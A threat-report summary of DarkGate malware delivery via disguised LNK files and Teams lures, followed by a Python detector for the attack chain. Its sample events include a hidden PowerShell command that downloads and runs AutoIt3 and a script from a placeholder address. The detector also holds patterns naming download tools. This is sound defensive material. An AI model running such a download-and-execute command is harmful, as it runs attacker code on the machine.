Report

DARKGATE MALWARE CAMPAIGN


19 pages

This report summarizes three DarkGate delivery attempts against Critical Start MDR customers in September and October 2023 that were detected and stopped before DarkGate deployed. Attackers used social engineering and “living off the land” Windows tools rather than exploiting known CVEs, commonly delivering ZIP files that contained LNK shortcuts disguised as PDFs (double extensions and PDF icons). In the October case, they mass-messaged employees via Microsoft Teams while impersonating the CEO and hosted the ZIP on a compromised SharePoint site. Clicking the lure launched hidden PowerShell to create a temp folder, download AutoIt3.exe plus an .au3 script, and execute it, a pattern mirrored in other vendor research. The report provides IOCs (hashes, IPs, domains, URLs) and detection/mitigat
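The delivery chain described above (double-extension LNK extracted from a ZIP, hidden PowerShell that creates a temp folder and downloads AutoIt3.exe plus a .au3 script, then AutoIt3 executing that script) maps cleanly onto process- and file-creation telemetry. The following detector is an added example written for this page; it is not code from the Critical Start report. It assumes Sysmon-style event fields (image, parent image, command line, target filename), and every sample event, path, hostname and the RFC 5737 address 203.0.113.10 are constructed placeholders, not indicators from the report.

```python
"""Flag the DarkGate delivery stages in constructed Sysmon-like events.

Added example for this page, not from the Critical Start report. Field names
follow Sysmon Event ID 1 (process create) and 11 (file create); all sample
events below are constructed and contain no real indicators.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    kind: str                  # "process_create" or "file_create"
    image: str = ""            # created process, or the process writing the file
    parent_image: str = ""
    command_line: str = ""
    target_filename: str = ""  # file_create only


# Heuristics derived from the narrative above (regexes are assumptions, tune per estate)
LNK_DOUBLE_EXT = re.compile(r"\.(?:pdf|docx?|xlsx?|txt)\.lnk\b", re.I)
HIDDEN_PS = re.compile(r"(?:^|\s)-w[a-z]*\s+hidden\b", re.I)       # -w / -WindowStyle Hidden
DOWNLOAD_CALL = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b"
                           r"|\bcurl\b|\bwget\b|start-bitstransfer", re.I)
AUTOIT_REFS = re.compile(r"autoit3\.exe|\.au3\b", re.I)
USER_WRITABLE = re.compile(r"\\(?:temp|tmp|programdata|public|downloads)\\", re.I)

# Which delivery stage each tag belongs to: 1 = lure, 2 = loader, 3 = execution
TAG_STAGE = {
    "lnk_double_extension": 1,
    "explorer_spawned_hidden_powershell": 2,
    "hidden_powershell_download": 2,
    "powershell_stages_autoit": 2,
    "autoit_script_from_temp": 3,
}


def detect_event(ev: Event) -> list[str]:
    """Return the tags a single event triggers, in a fixed order."""
    tags: list[str] = []
    img = ev.image.lower()
    parent = ev.parent_image.lower()
    cmd = ev.command_line

    if ev.kind == "file_create":
        # Stage 1: a shortcut disguised as a document lands on disk (e.g. ZIP extraction)
        if LNK_DOUBLE_EXT.search(ev.target_filename):
            tags.append("lnk_double_extension")
        return tags

    if LNK_DOUBLE_EXT.search(cmd):
        tags.append("lnk_double_extension")

    if img.endswith(("powershell.exe", "pwsh.exe")):
        # Stage 2: PowerShell run hidden straight from the shell (LNK double-click)
        if parent.endswith("explorer.exe") and HIDDEN_PS.search(cmd):
            tags.append("explorer_spawned_hidden_powershell")
        if HIDDEN_PS.search(cmd) and DOWNLOAD_CALL.search(cmd):
            tags.append("hidden_powershell_download")
        if AUTOIT_REFS.search(cmd):
            tags.append("powershell_stages_autoit")

    # Stage 3: the AutoIt interpreter running a script out of a user-writable folder
    if img.endswith("autoit3.exe") and re.search(r"\.au3\b", cmd, re.I) \
            and USER_WRITABLE.search(cmd):
        tags.append("autoit_script_from_temp")
    return tags


def correlate(events: list[Event]) -> dict:
    """Aggregate tags over one host's events; alert when 2+ distinct stages appear."""
    tags: set[str] = set()
    for ev in events:
        tags.update(detect_event(ev))
    stages = {TAG_STAGE[t] for t in tags}
    return {"tags": sorted(tags), "darkgate_chain": len(stages) >= 2}


# Constructed sample events (hypothetical host, user, paths and placeholder address)
SAMPLE_EVENTS = [
    Event("file_create", image=r"C:\Windows\explorer.exe",
          target_filename=r"C:\Users\jdoe\Downloads\Invoice\Invoice.pdf.lnk"),
    Event("process_create", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\explorer.exe",
          command_line=r'''powershell.exe -w hidden -c "mkdir C:\temp\abc; '''
                       r'''(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/AutoIt3.exe','C:\temp\abc\AutoIt3.exe'); '''
                       r'''(New-Object Net.WebClient).DownloadFile('http://203.0.113.10/s.au3','C:\temp\abc\s.au3'); '''
                       r'''Start-Process 'C:\temp\abc\AutoIt3.exe' -ArgumentList 'C:\temp\abc\s.au3'"'''),
    Event("process_create", image=r"C:\temp\abc\AutoIt3.exe",
          parent_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          command_line=r'"C:\temp\abc\AutoIt3.exe" C:\temp\abc\s.au3'),
    # Benign control: an admin script launched from explorer, nothing hidden or downloaded
    Event("process_create", image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
          parent_image=r"C:\Windows\explorer.exe",
          command_line=r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"),
]


def run_sample() -> dict:
    return correlate(SAMPLE_EVENTS)


if __name__ == "__main__":
    print(run_sample())
```

Requiring two distinct stages before alerting keeps a lone `-WindowStyle Hidden` admin script or a stray double-extension file from paging anyone, while the full lure, loader and AutoIt execution sequence still fires; in production the same tags would be joined on host and a short time window rather than over a flat list.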
